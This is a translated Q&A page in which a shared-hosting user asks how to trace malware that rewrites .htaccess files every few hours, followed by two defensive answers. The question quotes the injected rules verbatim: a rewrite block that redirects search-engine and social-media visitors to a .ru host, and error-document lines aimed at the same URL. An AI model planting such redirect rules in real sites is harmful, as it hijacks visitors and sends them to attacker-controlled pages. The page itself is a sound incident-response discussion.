hospedagem compartilhada com malware, o arquivo .htaccess é modificado a cada 2 horas ou mais

Question

hospedagem compartilhada com malware, o arquivo .htaccess é modificado a cada 2 horas ou mais

#1 resposta do (2 votos)
#2 resposta do (1 votos)

1

Passei o dia todo hoje em dia procurando malware na hospedagem compartilhada de um de meus clientes.

A questão é a seguinte: A cada 2 horas ou mais o arquivo .htaccess e todos os outros arquivos .htaccess são modificados, na parte superior do arquivo essas linhas são adicionadas:

IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
</IfModule>

e na parte inferior:

ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8

O principal problema que eu não sou root no servidor, e não pode sudo, pois isso é compartilhado hospedagem com centenas de sites. Comandos bons típicos como dmesg, lsof, dtrace, chattr e muitos outros não estão disponíveis para mim, pois não sou root.

Não consigo encontrar quem está modificando os arquivos .htaccess, como obtenho essa informação? Meu palpite é que algum script php está mudando o que é chamado de fora via comando e controle.

Isto parece estar relacionado com isto: link

Como descubro quem está modificando arquivos .htaccess sem ser root?

apache-2.2

por apache 08.06.2012 / 00:36

2 respostas

Tags apache-2.2

Cisco Router - Adicione um arquivo MIB ausente DNS Reencaminhadores condicionais ignorados num dos DC's

score 2 · Answer 1

Sem raiz, ou acesso a ferramentas de diagnóstico, você estaria batendo a cabeça contra a parede. Você pode pesquisar arquivos procurando .ru para ver se é algo que está sob seu controle.

Existem ferramentas que você poderia tirar uma foto no escuro e tentar: inotify, lsof (não provável) - ou simplesmente chowning o arquivo .htaccess para não ser gravável pelo Apache (se possível). Se for a cada duas horas, veja também crontab .

No final, algo ainda está arruinado e você provavelmente deve se referir a isso: Como faço para lidar com um servidor comprometido?

score 1 · Answer 2

Você deve antes de tudo pedir ajuda ao seu provedor de hospedagem, eles gostariam de saber que uma das redes hospedadas foi hackeada. É possível que todo o servidor esteja comprometido. Nesse caso, seria responsabilidade do seu provedor transferir seu site para outro servidor seguro, para que eles possam analisar, limpar e reinstalar.

Em qualquer caso, você deve pedir-lhes para correlacionar a data / hora do arquivo .htaccess modificado com qualquer tipo de registro que eles tenham: access.log, auth.log, log do servidor FTP, etc.

Além disso, pode ser útil comparar os arquivos em sua web com um backup recente para que você possa ver o que mais foi modificado.